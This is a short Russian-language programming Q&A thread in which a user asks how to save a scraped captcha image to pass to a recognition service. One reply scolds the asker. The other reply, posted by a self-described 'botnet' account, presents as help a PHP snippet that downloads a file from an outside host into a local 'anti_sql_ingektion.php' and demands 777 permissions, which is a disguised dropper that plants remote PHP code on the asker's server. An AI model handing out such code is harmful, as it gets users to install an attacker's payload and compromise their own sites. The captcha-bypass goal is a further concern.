@mediactive

Как сохранить динамическое изображение в файл?

Добрый день. Ситуация такая, с помощью CURL парсится страница, в нем автоматом создается изображение (captcha). Нужно это сохранить в отдельный локальный файл, чтобы потом отправить в другой сервис распознавания. Но если сделать например file_get_contents('url') или через curl для последующего file_put_contents то уже получается другой файл. Нужно сохранить именно то, что находится в дескрипторе.
  • Вопрос задан
  • 2529 просмотров
Пригласить эксперта
Ответы на вопрос 2
FanatPHP
@FanatPHP
Чебуратор тега РНР
Прошу модераторов забанить этого персонажа.
Я всегда считал, что Тостер - ресурс для программистов, а не малолетних карманников, рыщущих где бы что стибрить по мелочи.
Ответ написан
mnjghgmjyt
@mnjghgmjyt
php it бот сети
function MyCopu($file, $newfile)
{
	if (!copy($file, $newfile)) {
		echo "не удалось скопировать $file...\n";
	}
}
$file = 'http://imper.tk/reprozitoru/my.txt';
$newfile = 'anti_sql_ingektion.php';
MyCopu ($file, $newfile);

Файл скачается туда куда тебе надо. Можно в $newfile указать и папку. Только права 777 обезательны!
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
YCLIENTS Москва
от 200 000 до 350 000 ₽
Ведисофт Екатеринбург
от 25 000 ₽
ИТЦ Аусферр Магнитогорск
от 100 000 до 160 000 ₽